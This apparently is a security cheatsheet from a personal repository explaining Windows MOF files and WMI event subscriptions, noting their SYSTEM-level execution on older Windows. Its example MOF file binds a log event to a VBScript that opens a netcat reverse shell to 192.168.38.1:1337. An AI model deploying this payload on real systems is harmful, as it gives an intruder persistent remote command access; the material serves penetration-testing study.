Home Explore Help
Sign In
msc
/
cheatsheets
1
0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Branch: wip
Branches Tags
cheatsheets
/
cheatsheets
/
security
/
windows
/
windows-mof-files.md

windows-mof-files.md 2.3 KB
Permalink History Raw

title: Windows MOF Files date: 2021-01-13

tags: [security, windows]

Windows MOF Files

  • MOF = Managed Object Format
  • MOF - language to describe CIM Classes for WMI

About MOF Files

WMI lets you execute when an event occures. Events := {Programm start, logon, ...}

Available Methods for MOF Classes

__EventFilter  : permits to define a Windows event,
__EventConsumer: defines a consumer. This class is actually an abstract class with several implementations. The most interesting one is ActiveScriptEventConsumer [9] because it makes possible to embed VBScript or JSScript in the consumer. Note that it is only available in the namespace root\subscription.
The cool thing is that the consumer runs with SYSTEM privilege on Windows XP and Windows 2003 Server. Under Vista, it is running under the LOCAL_SERVICE user. I haven't tried under Windows 7, maybe someone ? =)
__FilterToConsumerBinding: it is used to link the two other instances. In other words, it permits to activate the consumer - and to execute its code - whenever the defined event occurs.

MOF Files can be compiled into the WMI repository using mofcomp.exe! BUT windows automatically compiles MOF files when put into the following path: %SystemRoot%\System32\wbem\mof

(Only on Windows XP, not anymore on Windows Vista and newer) :/

This Path is only writable as Administrator!

Attachment

Example MOF File, this executes a VBScript when an Logon Events occures

#pragma namespace ("\\\\.\\root\\subscription")

instance of __EventFilter as $FILTER
{
    Name = "CLASS_FIRST_TEST";
    EventNamespace = "root\\cimv2";
 Query = "SELECT * FROM __InstanceCreationEvent "
  "WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND "
  "TargetInstance.LogFile=\"Application\"";

    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $CONSUMER
{
    Name = "CLASS_FIRST_TEST";
    ScriptingEngine = "VBScript";

    ScriptText =
      "Set objShell = CreateObject(\"WScript.Shell\")\n"
   "objShell.Run \"C:\\Windows\\system32\\cmd.exe /C C:\\nc.exe 192.168.38.1 1337 -e C:\\Windows\\system32\\cmd.exe\"\n";
};

instance of __FilterToConsumerBinding
{
    Consumer = $CONSUMER ;
    Filter = $FILTER ;
};

Reference